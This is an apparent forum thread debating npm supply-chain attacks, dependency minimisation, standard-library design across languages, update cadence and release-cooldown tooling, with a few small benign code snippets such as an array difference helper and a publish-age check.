OK, in this case it looks like it is doing a lot of runtime checking of arguments to treat them differently based on what type they are. If we restrict use to only work with arrays, or whatever we have in our project where we need `difference`, then it should become much simpler and an easy rewrite. An alternative could be to have another argument, a function that gives us the `next` thing. Then the logic for that is to be specified by the caller.
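For example, an array-only version (ignoring lodash's array-like and iteratee handling) is only a few lines:

// Array-only difference: values in `a` that are not present in `b`
const difference = (a, b) => {
  const exclude = new Set(b); // Set.has uses SameValueZero, matching lodash's comparison
  return a.filter((x) => !exclude.has(x));
};

// difference([2, 1, 3], [2, 3]) -> [1]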
Tree shaking however, will not help you, if you have to first install a library using NPM. It will only help you reduce overhead in the code served to a browser. Malicious code can run much earlier, and would be avoided, if you rewrite or extract relevant code from a library, avoiding to install the library using NPM. Or is there some pre-installation tree shaking, that I am unaware of? That would actually be interesting.
I guess that pre-installation tree shaking in this case is installing ’lodash.difference’ instead of ’lodash’. :)
Yes, fewer, larger, trustworthy dependencies with tree shaking is the way to go if you ask me.
Yeah, but perhaps we could have different flavors. If you like functional style you could have a very functional standard library that doesn't mutate anything, or if you like object oriented stuff you could have classes of object with methods that mutate themselves. And the Typescript folks could have a strongly typed library.
I wanted to make a joke about
npm install stdlib
…but double checked before and @stdlib/stdlib has 58 dependencies, so the joke preempted me.

I think the level of protection you get from that depends on how the unused code detection interacts with whatever tricks someone is using for malicious code.
I agree with this but the problem is that a lot of the extra stuff dependencies do is indeed to protect from security issues.
If you're gonna reimplement only the code you need from a dependency, it's hard to know how much of the stuff you're leaving out is just extra stuff you don't need and how much might be security fixes that may not be apparent to you but that the dependency, by virtue of being worked on and used by many people, has fixed.
I'm using LLMs to write stuff that would normally be in dependencies, mostly because I don't want to learn how to use the dependency, and writing a new one from scratch is really easy with LLMs.
Age of bespoke software is here. Did you have any hard to spot non-obvious bugs in these code units?
It isn't feasible to audit every line of every dependency, just as it's not possible to audit the full behavior of every employee that works at your company.
In both cases, the solution is similar: try to restrict access to vital systems only to those you trust, so that you have less need to audit their every move.
Your system administrators can access the server room, but the on-site barista can't. Your HTTP server is trusted enough to run in prod, but a color-formatting library isn't.
> It isn't feasible to audit every line of every dependency, just as it's not possible to audit the full behavior of every employee that works at your company.
Your employees are carefully vetted before hiring. You've got their names, addresses, and social security numbers. There's someone you're able to hold accountable if they steal from you or start breaking everything in the office.
This seems more like having several random contractors who you've never met coming into your business in the middle of night. Contractors that were hired by multiple anonymous agencies you just found online somewhere with company names like gkz00d or 420_C0der69 who you've also never even spoken to and who have made it clear that they can't be held accountable for anything bad that happens. Agencies that routinely swap workers into or out of various roles at your company without asking or telling you, so you don't have any idea who the person working in the office is, what they're doing, or even if they're supposed to be there.
"To make thing easier for us we want your stuff to require the use of a bunch of code (much of which does things you don't even need) that we haven't bothered looking at because that'd be too much work for us. Oh, and third parties we have no relationship with control a whole bunch of that code which means it can be changed at any moment introducing bugs and security issues we might not hear about for months/years" seems like it should be a hard sell to a boss or a client, but it's sadly the norm.
Assuming that something is going to go wrong and trying to limit the inevitable damage is smart, but limiting the amount of untrustworthy code maintained by the whims of random strangers is even better. Especially when the reasons for including something that carries so much risk is to add something trivial or something you could have just written yourself in the first place.
> This seems more like having several random contractors who you've never met coming into your business in the middle of night. [...] Agencies that routinely swap workers into or out of various roles at your company without asking or telling you, so you don't have any idea who the person working in the office is, what they're doing, or even if they're supposed to be there.
Sounds very similar to how global SIs staff enterprise IT contracts.
That hit much too close to reality. It's exactly like that. Even the names were spot on!
This is true to the extent that you actually _use_ all of the features of a dependency.
You only need to rewrite what you use, which for many (probably most) libraries will be 1% or less of it
Indeed. About 26% of the disk space for a freshly-installed copy of pip 25.2 for Python 3.13 comes from https://pypi.org/project/rich/ (and its otherwise-unneeded dependency https://pypi.org/project/Pygments/), "a Python library for rich text and beautiful formatting in the terminal", hardly any of the features of which are relevant to pip. This is in spite of an apparent manual tree-shaking effort (mostly on Pygments) — a separate installed copy of rich+Pygments is larger than pip. But even with that attempt, for example, there are hundreds of kilobytes taken up for a single giant mapping of "friendly" string names to literally thousands of emoji.
Another 20% or more is https://pypi.org/project/requests/ and its dependencies — this is an extremely popular project despite that the standard library already provides the ability to make HTTPS connections (people just hate the API that much). One of requests' dependencies is certifi, which is basically just a .pem file in Python package form. The vendored requests has not seen any tree-shaking as far as I can tell.
This sort of thing is a big part of why I'll be able to make PAPER much smaller.
> it's probably even less feasible to rewrite every single dependency from scratch.
When you code in a high-security environment, where bad code can cost the company millions of dollars in fines, somehow you find a way.
The sibling commenter is correct. You write what you can. You only import from trusted, vetted sources.
> If it's not feasible to audit every single dependency, it's probably even less feasible to rewrite every single dependency from scratch.
There is no need to rewrite dependencies. Sometimes it just so happens that a project can live without outputting fancy colorful text to stdout, or doesn't need to spread transitive dependencies on debug utilities. Perhaps these concerns should be a part of the standard library, perhaps these concerns are useless.
And don't get me started on bullshit polyfill packages. That's an attack vector waiting to be exploited.
It's much more feasible these days. For my personal projects I just have CC create only a plain HTML file with raw JS and script links.
Not sure I completely agree as you often use only a small part of a library
One interesting side effect of AI is that it makes it sometimes easy to just recreate the behavior, perhaps without even realizing it..
is it that infeasible with LLMs?
a lot of these dependencies are higher order function definitions, which never change, and could be copy/pasted around just fine. they're never gonna change
"rewrite every single dependency from scratch"
No need to. But also no need to pull in a dependency that could be just a few lines of own (LLM generated) code.
>>a few lines of own (LLM generated) code.
... and now you've switched the attack vector to a hostile LLM.
Sure but that's a one time vector. If the attacker didn't infiltrate the LLM before it generated the code, then the code is not going to suddenly go hostile like an npm package can.
Though you will see the code at least, when you are copy pasting it and if it is really only a few lines, you may be able to review it. Should review it of course.
I did not say to do blind copy paste.
A few lines of code can be audited.
Sounds like the job for an LLM tool to extract what's actually used from appropriately-licensed OSS modules and paste directly into codebases.
Requiring you to audit both security and robustness on the LLM generated code.
Creating two problems, where there was one.
I didn't say generate :) - in all seriousness, I think you could reasonably have it copy the code for e.g. lodash.merge() and paste it into your codebase without the headaches you're describing. IMO, this method would be practical for a majority of npm deps in prod code. There are some I'd want to rely on the lib (and its maintenance over time), but also... a sort function is a sort function.
LLMs don't copy and paste. They ingest and generate. The output will always be a generated something.
You can give an LLM access to tools that it can invoke to actually copy and paste.
In 2022, sure. But not today. Even something as simple as generating and running a `git clone && cp xyz` command will create code not directly generated by the LLM.
In what way do you think this rebuts the message you responded to?
LLMs can do the audits now.
Do you have any evidence it wouldn't just make up code?
This is already a thing, compiled languages have been doing this for decades. This is just C++ templates with extra steps.
>> and keeping them to well-known and trustworthy (security-wise) creators.
The true threat here isn't the immediate dependency though, it's the recursive supply chain of dependencies. "Trustworthy" doesn't make any sense either when the root cause is almost always someone trustworthy getting phished. Finally, if I'm not capable of auditing the dependencies, it's unlikely I can replace them with my own code. That's like telling a vibe coder the solution to their brittle creations is to not use AI and write the code themselves.
> Finally if I'm not capable of auditing the dependencies it's unlikely I can replace them with my own code. That's like telling a vibe coder the solution to their brittle creations is to not use AI and write the code themselves.
In both cases, actually doing the work and writing a function instead of adding a dependency or asking an AI to write it for you will probably make you a better coder and one who is better able to audit code you want to blindly trust in the future.
Just like it's going to make you a better engineer if you design the microchips in your workstation yourself instead of buying an x86 CPU.
It's still neither realistic nor helpful advice.
"A little copying is better than a little dependency" -- Go proverb (also applies to other programming languages)
IMO, one thing I like in npm packages is that they are usually small, and they should ideally converge towards stability (frozen)...
If they are not, something is bad and the dependency should be "reduced" if at all possible.
Exactly.
I always tried to keep the dependencies to a minimum.
Another thing you can do is lock versions to a year ago (this is what linux distros do) and wait for multiple audits of something, or lack of reports in the wild, before updating.
I saw one of those word-substitution browser plugins a few years back that swapped "dependency" for "liability", and it was basically never wrong.
(Big fan of version pinning in basically every context, too)
I'm re-reading all these previous comments, replacing "dependency" for "liability" in my mind, and it's being quite fun to see how well everything still keeps meaning the same, but better
> I think this is a good argument for reducing your dependency count as much as possible, and keeping them to well-known and trustworthy (security-wise) creators.
I wonder to which extent is the extreme dependency count a symptom of a standard library that is too minimalistic for the ecosystem's needs.
Perhaps this issue could be addressed by a "version set" approach to bundling stable npm packages.
I remember people in the JS crowd getting really mad at the implication that this all was pretty much inevitable, like 10/15 years ago. Can’t say they didn’t do great things since then, but it’s not like nobody saw this coming.
Easier said than done when your ecosystem of choice took the Unix philosophy of doing one thing well, misinterpreted it and then drove it off a cliff. The dependency tree of a simple Python service is incomparable to a Node service of similar complexity.
As a security guy, for years, you get laughed out of the room suggesting devs limit their dependencies and don't download half of the internet while building. You are an obstruction for making profit. And obviously reading the code does very little since modern (and especially Javascript) code just glues together frameworks and libraries, and there's no way a single human being is going to read a couple million lines of code.
There are no real solutions to the problem, except for reducing exposure somewhat by limiting yourself to a mostly frozen subset of packages that are hopefully vetted more stringently by more people.
The "solution" would be using a language with a strong standard library and then having a trusted 3rd party manually audit any approved packages.
THEN use artifactory on top of that.
That's boring and slow though. Whatever, I want my packages and I want them now. Part of the issue is that the whole industry is built upon goodwill and hope.
Some 19 year old hacked together a new front end framework last week, better use it in prod because why not.
Occasionally I want to turn off my brain and just buy some shoes. The Timberland website made that nearly impossible last week. When I gave up on logging in for free shipping and just paid full price, I get an email a few days later saying they ran out of shoes.
Alright. I guess Amazon is dominant for a reason.
This is the right answer. I'm willing to stick my head out and assert that languages with a "minimal" standard library are defective by design. The argument about APIs being stuck is moot with approaches like Rust's epochs or "strict mode".
Standard libraries should include everything needed to interact with modern systems. This means HTTP parsing, HTTP requests, and JSON parsing. Some languages are excellent (like Python), while some are halfway there (like Go), and some are just broken (Rust).
External libraries are for niche or specialized functionality. External libraries are not for functionality that is used by most modern software. To put your head in the ground and insist otherwise is madness and will lead to ridiculous outcomes like this.
> Standard libraries should include everything needed to interact with modern systems.
This is great when the stdlib is well-designed and kept current when new standards and so on become available, but often "batteries included" approaches fail to cover all needs adequately, are slow to adopt new standards or introduce poorly designed modules that then cannot be easily changed, and/or fail to keep up-to-date with the evolution of the language.
I think the best approach is to have a stdlib of a size that can be adequately maintained/improved, then bless a number of externally developed libraries (maybe even making them available in some official "community" module or something with weaker stability guarantees than the stdlib).
I find it a bit funny that you specifically say HTTP handling and JSON are the elements required when that's only a small subset of things needed for modern systems. For instance, cryptography is something that's frequently required, and built-in modules for it often suck and are just ignored in favor of external libraries.
EDIT: actually, I think my biggest issue with what you've said is that you're comparing Python, Go, and Rust. These languages all have vastly different design considerations. In a language like Python, you basically want to be able to just bash together some code quickly that can get things working. While I might dislike it, a "batteries included" approach makes sense here. Go is somewhat similar since it's designed to take someone from no knowledge of the language to productive quickly. Including a lot in the stdlib makes sense here since it's easier to find stuff that way. While Rust can be used like Python and Go, that's not really its main purpose. It's really meant as an alternative to C++ and the various niches C/C++ have dominated for years. In a language like that, where performance is often key, I'd rather have a higher quality external library than just something shoved into the stdlib.
The tradeoff of “batteries included” vs not is real: Python developers famously reach for community libraries like requests right away to avoid using the built-in tooling.
I wasn't even aware there _was_ built-in tooling...
And yet, there are times where all I've had access to was the stdlib. I was damn glad for urllib2 at those times. It's worth it to have a batteries included stdlib, even if parts of it don't wind up being the most commonly used by the community.
The fact that there is a 'urllib2' implies that there's a 'urllib', which tells us something pretty important about the dangers of kitchen-sink standard libraries.
But nothing prevents a language to have rich and OPTIONAL stdlib, so that devs can choose different solutions without linking bunch of junk they do not use.
Really, good stdlib still allows you to use better suited 3rd party libraries. Lack of good stdlib doesn't add anything.
Related: Rust Dependencies Scare Me [1]
> This is the right answer. I'm willing to stick my head out and assert that languages with a "minimal" standard library are defective by design.
> Standard libraries should include everything needed to interact with modern systems. This means HTTP parsing, HTTP requests, and JSON parsing.
There is another way. Why not make the standard library itself pluggable? Rust has a standard library and a core library. The standard library is optional, especially for bare-metal targets.
Make the core library as light as possible, with just enough functionality to implement other libraries, including the interfaces/shims for absolutely necessary modules like allocators and basic data structures like vectors, hashmaps, etc. Then move all other stuff into the standard library. The official standard library can be minimal like the Rust standard library is now. However, we should be able to replace the official standard library with a 3rd party standard library of choice. (What I mean by standard library here is the 'base library', not the official library.) Third party standard library can be as light or as comprehensive as you might want. That also will make auditing the default codebase possible.
I don't know how realistic this is, but something similar is already there in Rust. While Rust has language features that support async programming, the actual implementation is in an external runtime like Tokio or smol. The clever bit here is that the other third party async libraries don't enforce or restrict your choice of the async runtime. The application developer can still choose whatever async runtime they want. Similarly, the 3rd party standard library must not restrict the choice of standard libraries. That means adding some interfaces in the core, as mentioned earlier.
This is the philosophy used by the Java world. Big parts of the standard library are plugin-based. For example, database access (JDBC), filesystem access (NIO), cryptography (JCA). The standard library defines the interfaces and sometimes provides a default implementation, but it can be extended or replaced.
It works well, but the downside of that approach is people complaining about how abstract things are.
That makes sense. Just adding a clarification here. I wasn't suggesting to replace the standard library with interfaces (traits in this case). I was saying that the core library/runtime should have the interfaces for the standard library to implement some bare minimum functionalities like the allocators. Their use is more or less transparent to the application and 3rd party library developers.
Meanwhile, the public API of the selected standard library need not be abstract at all. Let's say that the bare minimum functionality expected from a 3rd party standard library is the same as the official standard library. They can just reimplement the official standard library at the minimum.
> External libraries are not for functionality that is used by most modern software.
Where do you draw the line though? It seems like you mostly spend your time writing HTTP servers reading/writing JSON, but is that what everyone else also spends their time doing? You'll end up with a standard library weighing GBs, just because "most developers write HTTP servers", which doesn't sound like a better solution.
I'm willing to stick my head the other way, and say I think the languages today are too large. Instead, they should have a smaller core, and the language designed in a way that you can extend the language via libraries. Basically more languages should be inspired by Lisps and everything should be a library.
> everything should be a library.
That's exactly npm's problem, though. What everybody is avoiding to say is that you need a concept of "trusted vendors". And, for the "OSS accelerates me" business crowd, that means paying for the stuff you use.
But who would want that when you're busy chasing "market fit".
> That's exactly npm's problem, though.
I don't think that's the problem with npm. The problem with npm is that no packages are signed, at all, so it ends up trivial for hackers to push new package versions, which they obviously shouldn't be able to do.
Since Shai-Hulud scanned maintainers' computers, if the signing key was stored there too (without a password), couldn't the attackers have published signed packages?
That is, how does signing prevent publishing of malware, exactly?
> if the signing key was stored there too (without a password), couldn't the attackers have published signed packages?
Yeah, of course. Also if they hosted their private key for the signature on their public blog, anyone could use it for publishing.
But for the sake of the argument, why don't we assume people are correctly using the thing we're talking about?
In past comments I said that a quick win would be to lean on certificates; those can't easily be forged once a certificate is accepted.
How did Shai-Hulud get access to maintainers' computers?
I don't think things being libraries (modular) is at odds with a standard library.
If you have a well-vetted base library that is frequently reviewed and undergoes regular security and quality checks, then you should be minimally concerned about the quality of code that goes on top.
In a well designed language, you can still export just what you need, or even replace parts of that standard library if you so choose.
This approach even handles your question: as use cases become more common, an active, invested* community (either paying or actively contributing) can add and vet modules, or remove old ones that no longer serve an active purpose.
But as soon as you find yourself "downloading the web" to get stuff done, something has probably gone horribly wrong.
IMO Python 2 was the gold standard for getting the std lib right. Mostly batteries included, but not going totally insane with it.
It's not an easy problem to solve.
Doing it the right way would create friction, developers might need to actually understand what the code is doing rather than pulling in random libraries.
Try explaining to your CTO that development will slow down to verify the entire dependency chain.
I'm more thinking C# or Java. If Microsoft or Oracle is providing a library you can hope it's safe.
You *could* have a development ecosystem called Safe C# which only comes with vetted libraries and doesn't allow anything else.
I'm sure other solutions already exist though.
Why?
This is a standard practice in most places I have worked, CI/CD only allowed to use internal repos, and libraries are only added after clearance.
Except that "clearance" invariably consists of bureaucratic rubber stamping and actually decreases security by making it harder and slower to fix newly discovered vulnerabilities.
Depends on the skills of the respective DevOps security team.
There are also tools that break CI/CD based on CVE reports from existing dependencies.
> Doing it the right way would create friction, developers might need to actually understand what the code is doing rather than pulling in random libraries.
Then let's add friction. Developers understanding code is what they should be doing.
CTOs understand the high cost of ransomware and disruption of service.
Java has been around for much longer and has exactly the same architecture regarding transitive dependencies, yet it doesn't suffer from weekly attacks like these that affect half the world. Not technically impossible, yet not happening (at least not at this scale).
If you want an actual solution, look for the differences. If you somehow end up figuring out that it's about the type of people using those ecosystems, then there is no easy technical solution.
> Standard libraries should include everything needed to interact with modern systems.
So, databases? Which then begs the question, which - Postgres, MySQL, SQLite, MS SQL, etc.? And some NoSQL, because modern systems might need it.
That basically means you need to pull in everything and the kitchen sink. And freeze it in time (because of backwards compatibility). HTML, HTTP parsing, and SHA1024 are perfectly reasonable now; wait two decades, and they might be as antiquated as XML.
So what your language designers end up doing is working on XML parsing, HTTP, and JSON libraries rather than designing a language.
If the JS way is madness, having everything available is another form of madness.
It is not madness. Java is a good example of a rich and modular standard library. Some components of it are eventually deprecated and removed (e.g. Applets), and this process takes long enough. Its standard library does include good crypto and an HTTP client, a database abstraction API (JDBC) which is implemented by database drivers, etc.
Yeah, and Java was always corporately funded, and to my knowledge no one really used either the http client or the XML parser. You basically have a collection of dead-weight libs that people have to begrudgingly maintain.
Granted, some (JDBC) are more useful than others. Although JDBC is more of an API and less of a library.
HttpClient is relatively new and getting HTTP/3 support next spring, so it’s certainly not falling into the dead weight category. You are probably confusing it with an older version from Java 1.1/1.4.
As for XML, JAXP was a common way to deal with it. Yes, there’s Xstream etc, but it doesn’t mean any of standard XML APIs are obsolete.
My favourite is java.awt.Robot
Spot on. I'd rather have a Python, Java, or .NET standard library that may have a few warts but works everywhere there is a fully compliant implementation, than play Lego with libraries that might not even support all platforms and are more easily open to such attacks.
Is java.util.logging.Logger not that great?
Sure, yet everyone that used it had a good night rest when Log4J exploit came to be.
slf4j is probably more common now than standard Logger, and it was a good night for those who used Logback as implementation.
>Some 19 year old hacked together a new front end framework last week, better use it in prod because why not.
The thing is, you don't have to be this undiscerning to end up with tons of packages.
Let's init a default next.js project. How many dependencies are there?
react, react-dom, next, typescript, @types/node, @types/react, @types/react-dom.
OK so 7... seems like a lot in some sense, but it's still missing many reasonable dependencies. Some sort of styling solution (tailwind, styled components, etc). Some sort of http client or graphql. And more. But let's just use the base dependencies as an example. Is 7 so bad? Maybe, maybe not, but you need to go deeper. How many packages are there?
55. What are they? I have no idea, go read the lock file I guess.
All of this while being pretty reasonable.
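For anyone who wants the actual list rather than eyeballing the lock file mentioned above, a small illustrative Node/TypeScript script will do it (assumes a lockfileVersion 2 or 3 package-lock.json in the current directory):

    // list-lock-packages.ts: print every package resolved in package-lock.json
    import { readFileSync } from "node:fs";

    const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));

    // In lockfileVersion 2/3, resolved packages live under the "packages" key;
    // the "" entry is the root project itself, so skip it.
    const entries = Object.entries(lock.packages ?? {}).filter(([path]) => path !== "");

    for (const [path, meta] of entries) {
      const name = path.replace(/^.*node_modules\//, ""); // "node_modules/@scope/name" -> "@scope/name"
      console.log(`${name}@${(meta as { version?: string }).version ?? "?"}`);
    }

    console.log(`total: ${entries.length} packages`);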
Java + Spring Boot BOM + Maven Central (signed jars) does fit the description.
I agree, it always seems to be NPM, and there's a reason for that.
I don’t recall hearing about constant supply chain attacks with CPAN
That was a different era. The velocity of change is 100x now and the expectation for public libraries to do common things is 100x higher as well.
Perl and CPAN are still a thing, much as people would like to think otherwise.
Because it's never been considered an interesting target, compared to npm's reach?
For a while CPAN was a very big deal and those packages were probably on just about every corporate network on Earth.
This comes across as not being self-aware as to why security is laughed out of rooms: I read this as you correctly identifying some risks but then only offering the false dichotomy of "risk" versus "no risk", without discussing middle grounds between the two or finding third ways that break the dichotomy.
I could just be projecting my own bad experiences with "security" folks (in quotes as I can't speak to their qualifications). My other big gripe is when they don't recognize UX as a vital part of security (if their solution is unusable, it won't be used).
This is how our security lead is. "I've identified X as a vulnerability, recommended remediation is to remove it." "We literally can't." He pokes around finding obscure vulnerabilities and recommends removing business critical software, yet we don't have MFA, our servers and networking UIs are on the main VLAN accessible by anyone, we have no tools to patch third party software, and all of our root passwords are the same. We bring real security concerns like this to him, and they just get backlogged because the stupid tools he runs only detect software vulns. It's insanity.
I've been a web developer for over two decades. I have specific well-tested solutions for avoiding external JS dependencies. Despite that, I have the exact same experience as the above security guy. Most developers love adding dependencies.
At my previous enterprise we had a saying:
Security: we put the ‘no’ in ‘innovation’.
I've always been very careful about dependencies, and freezing them to versions that are known to work well.
I was shocked when I found out that at some of the most profitable shops, most of their code is just a bunch of different third-party libraries badly cobbled together, with only a superficial understanding of how those libraries work.
Your proposed solution does not work for web applications built with node packages.
Essential tools such as Jest add 300 packages on their own.
You already have hundreds to thousands of packages installed, fretting over a few more for that DatePicker or something is pretty much a waste of time.
Agree on the only solution being reducing dependencies.
Even weirder in the EU, where things like the Cyber Resilience Act mandate patching publicly known vulnerabilities. Cool, so let's just stay up to date? Supply-chain vuln goes Brrrrrr
The post you replied to suggested a real solution to the problem. It was implemented in my current org years ago (after log4j) and we have not been affected by any of the malware dependencies that have appeared since.
> You are an obstruction for making profit.
This explains a lot. Really, this is a big part of why society is collapsing as we speak.
"There should be no DRM in phones" - "You Are An Obstruction To Making Profit".
"People should own their devices, we must not disallow custom software on it" - "YAAOTMP"
"sir, the application will weigh 2G and do almost nothing yet, should we minify it or use different framework?" - "YAAOTMP".
"Madame, this product will cost too much and require unnecessary payments" - "YAAOTMP"
Etc. etc. Like in this "Silicon Valley" comedy series. But for real, and affecting us greatly.
Death comes to corp CEO, he screams YAAOTMP, death leaves shocked. Startup CEO watches the scene. His jedi sword turns from blue to red.
Package registries should step up. They are doing some stuff but still NPM could do more.
Personally, I go further than this and just never update dependencies unless the dependency has a bug that affects my usage of it. Vulnerabilities are included.
It is insane to me how many developers update dependencies in a project regularly. You should almost never be updating dependencies, when you do it should be because it fixes a bug (including a security issue) that you have in your project, or a new feature that you need to use.
The only time this philosophy has bitten me was in an older project where I had to convince a PM who built some node project on their machine that the vulnerability warnings were not actually issues that affected our project.
Edit: because I don't want to reply to three things with the same comment - what are you using for dependencies where a) you require frequent updates and b) those updates are really hard?
Like for example, I've avoided updating node dependencies that have "vulnerabilities" because I know the vuln doesn't affect me. Rarely do I need to update to support new features because the dependency I pick has the features I need when I choose to use it (and if it only supports partial usage, you write it yourself!). If I see that a dependency frequently has bugs or breakages across updates then I stop using it, or freeze my usage of it.
Then you run the risk of drifting so much behind that when you actually have to upgrade it becomes a gargantuan task. Both ends of the scale have problems.
That's why there's an emphasis on stability. If things works fine, don't change. If you're applying security patches, don't break the API.
In NPM world, there's so much churn that it would be comical if not for the security aspects.
That's only a problem for you, the developer, though, and is merely an annoyance about time spent. And it's all stuff you had to do anyway to update--you're just doing it all at once instead of spread out over time. A supply chain malware attack is a problem for every one of your users--who will all leave you once the dust is settled--and you end up in headline news at the top of HN's front page. These problems are not comparable. One is a rough day. The other is the end of your project.
The time upgrading is not linear, it’s exponential. If it hurts, do it more often! https://martinfowler.com/bliki/FrequencyReducesDifficulty.ht...
A log4j level vulnerability happens again. Do you need 10 minutes to update? 1 hour? 1 day? 1 week? Multiple months? The more you are drifting behind on updates, the worse it gets, which also affects every one of your users, your business, and might be the end of your project.
> A log4j level vulnerability happens again. [...] The more you are drifting behind on updates, the worse it gets
That one is a funny example in this context. If you were drifting far behind on updates, so far that you were still on the obsolete log4j 1.x, you were immune to that vulnerability (log4shell). That obsolete log4j version had other known vulnerabilities, but most of them on rarely used optional components, and none of them affected basic uses of it to log to the console or disk. And even better, there were so many people using that obsolete log4j version, that a binary compatible fork quickly appeared (reload4j) which just removes the vulnerable components (and fixes everything that wasn't removed); it takes 10 minutes to update to it, or at worst 1 hour if you have to tweak your dependencies to exclude the log4j artifact.
(And then it happened again, this time with Spring (spring4shell): if you were far behind on updates, so far that you were still on the very old but still somewhat supported Java 8, you were immune to that vulnerability.)
counterpoint, if the runtime itself (nodejs) has a critical issue, you haven't updated for years, you're on an end-of-life version, and you cannot upgrade because you have dependencies that do not support the new version of the runtime, you're in for a painful day. The argument for updating often is that when you -are- exposed to a vulnerability that you need a fix for, it's a much smaller project to revert or patch that single issue.
Otherwise, I agree with the sentiment that too many people try to update the world too often. Keeping up with runtime updates as often as possible (node.js is more trusted than any given NPM module) and updating only when dependencies are no longer compatible is a better middle ground.
The same logic you used for runtimes also applies to libraries. Vulnerabilities are found in popular JS libraries all the time. The surface area is, of course, smaller than that of a runtime like Node.js, but there is still lots of potential for security issues with out-of-date libraries.
There really is no good solution other than to reduce the surface area for vulnerabilities by reducing the total amount of code you depend on (including third-party code). In practice, this means using as few dependencies as possible. If you only use one or two functions from lodash or some other helper library, you're probably better off writing or pulling in those functions directly instead.
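As a hedged illustration of that last suggestion: if the only thing you need from a helper library is something like lodash's pick, a hand-rolled version is a few lines with zero transitive dependencies.

    // A project-local equivalent of lodash's pick: copy only the listed keys.
    function pick<T extends object, K extends keyof T>(obj: T, keys: readonly K[]): Pick<T, K> {
      const out = {} as Pick<T, K>;
      for (const key of keys) {
        if (key in obj) {
          out[key] = obj[key];
        }
      }
      return out;
    }

    // Usage
    const user = { id: 1, name: "ada", passwordHash: "..." };
    const publicUser = pick(user, ["id", "name"]);
    console.log(publicUser); // { id: 1, name: "ada" }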
Fully disagree. The problem is that when you do need to upgrade, either for a bug fix, security fix, or new feature that you need/want, it's a lot easier to upgrade if your last upgrade was 3 months ago than if it was 3 years ago.
This has bitten me so many times (usually at large orgs where policy is to be conservative about upgrades) that I can't even consider not upgrading all my dependencies at least once a quarter.
yeah, I typically start any substantial development work with getting things up to date so you're not building on something you'll find out is already broken when you do get around to that painful upgrade.
this seems to me to be trading one problem that might happen for one that is guaranteed: a very painful upgrade. Maybe you only do it once in a while but it will always suck.
The problem here is that there might be a bug fix or even security fix that is not backported to old versions, and you suddenly have to update to a much newer version in a short time
That works fine if you have few dependencies (obviously this is a good practice) and you have time to vet all updates and determine whether a vulnerability impacts your particular code, but that doesn’t scale if you’re a security organization at, say, a small company.
Dependency hell exists at both ends. Too quick can bite you just as much as being too slow/lazy.
The article explicitly mentions a way to do this:
Use NPM Package Cooldown Check
The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
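The check quoted above is a hosted product, but the underlying idea is simple enough to sketch. Below is a rough, hypothetical illustration (not StepSecurity's implementation): look up a version's publish timestamp in the npm registry's time metadata and fail if it is younger than the cooldown window. Assumes Node 18+ for the global fetch.

    // cooldown-check.ts: refuse package versions published within the cooldown window.
    // Sketch only; a real check would diff the lockfile changes in a pull request.
    const COOLDOWN_MS = 2 * 24 * 60 * 60 * 1000; // default: 2 days

    async function assertCooledDown(name: string, version: string): Promise<void> {
      // Scoped packages are requested as @scope%2Fname on the registry.
      const res = await fetch(`https://registry.npmjs.org/${name.replace("/", "%2F")}`);
      if (!res.ok) throw new Error(`registry lookup failed for ${name}: ${res.status}`);

      // The registry document's "time" field maps each version to its publish date.
      const meta = (await res.json()) as { time?: Record<string, string> };
      const published = meta.time?.[version];
      if (!published) throw new Error(`no publish time found for ${name}@${version}`);

      const ageMs = Date.now() - new Date(published).getTime();
      if (ageMs < COOLDOWN_MS) {
        const hours = (ageMs / 3_600_000).toFixed(1);
        throw new Error(`${name}@${version} is only ${hours}h old; blocked by cooldown`);
      }
    }

    // Example (hypothetical package and version):
    // await assertCooledDown("some-package", "1.2.3");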
This attack was only targeting user environments.
Having secrets in a different security context would help: for example, root- or secrets-user-owned secret files that the user can only access for certain actions (the simplest way would be e.g. a sudoers entry whitelisting a precise command like git push), which would prevent arbitrary reads of secrets.
The other part of this attack, creating new GitHub Actions workflows, is also a privilege normal users don't need to exercise often, or unconstrained. There are certainly ways to prevent/restrict that too.
All this "was a supply chain attack" fuss here is IMO missing the forest for the trees. Changing the security context for these two actions is easier to implement than supply-chain analysis, and this basic approach is more reliable than trusting the community to find a backdoor before you apply the update. It's security 101. Sure, there are post-install scripts that can attack the system, but that is a whole different game.
That's a feature of stepsecurity though, it's not built-in.
This is basically what I recommended people do with windows updates back when MS gave people a choice about when/if to install them, with shorter windows for critical updates and much longer ones for low priority updates or ones that only affected things they weren't using.
And hope there isn’t some recently patched zero-day RCE exploit at the same time.
> sort of a "delayed" mode to updating my own dependencies. The idea is that when I want to update my dependencies, instead of updating to the absolute latest version available of everything, it updates to versions that were released no more than some configurable amount of time ago.
For Python's uv, you can do something like:
> uv lock --exclude-newer $(date --iso -d "2 days ago")
Awesome tip, thanks!
oh that uv lock is neat, i am going to give that a go
pnpm just added this: https://pnpm.io/blog/releases/10.16
This sounds nice in theory, but does it really solve the issue? I think that if no one's installing that package, then no one is noticing the malware and no one is reporting that package either. It merely slightly improves the chances that the author would notice a version they didn't release, but this doesn't work if the author is not actively working on the compromised project.
These days compromised packages are often detected automatically by software that scans all packages uploaded to npm like https://socket.dev or https://snyk.io. So I imagine it's still useful to have those services scan these packages first, before they go out to the masses.
Measures like this also aren't meant to be "final solutions" either, but stop-gaps. Slowing the spread can still be helpful when a large scale attack like this does occur. But I'm also not entirely sure how much that weighs against potentially slowing the discovery as well.
Ultimately this is still a repository problem and not a package manager one. These are merely band-aids. The responsibility lies with npm (the repository) to implement proper solutions here.
> The responsibility lies with
No, it doesn't solve the issue, but it probably helps.
And I agree that if everyone did this, it would slow down finding issues in new releases. Not really sure what to say to that... aside from the selfish idea that if I do it, but most other people don't, it won't affect me.
a long enough delay would solve the issue for account takeovers, and bold attacks like this.
It would not solve for a bad actor gaining trust over years, then contributing seemingly innocent code that contains an exploitable bug with enough plausible deniability to remain on the team after it is patched.
minimumReleaseAge is pretty good! Nice!!
I do wish there were some lists of compromised versions, that package managers could disallow from.
there's apparently an npm RFC from 2022 proposing a similar (but potentially slightly better?) solution https://github.com/npm/rfcs/issues/646
bun is also working on it: https://github.com/oven-sh/bun/issues/22679
Aren't they found quickly because people upgrade quickly?
this btw would also solve social media. if only accounts required a month waiting period before they could speak.
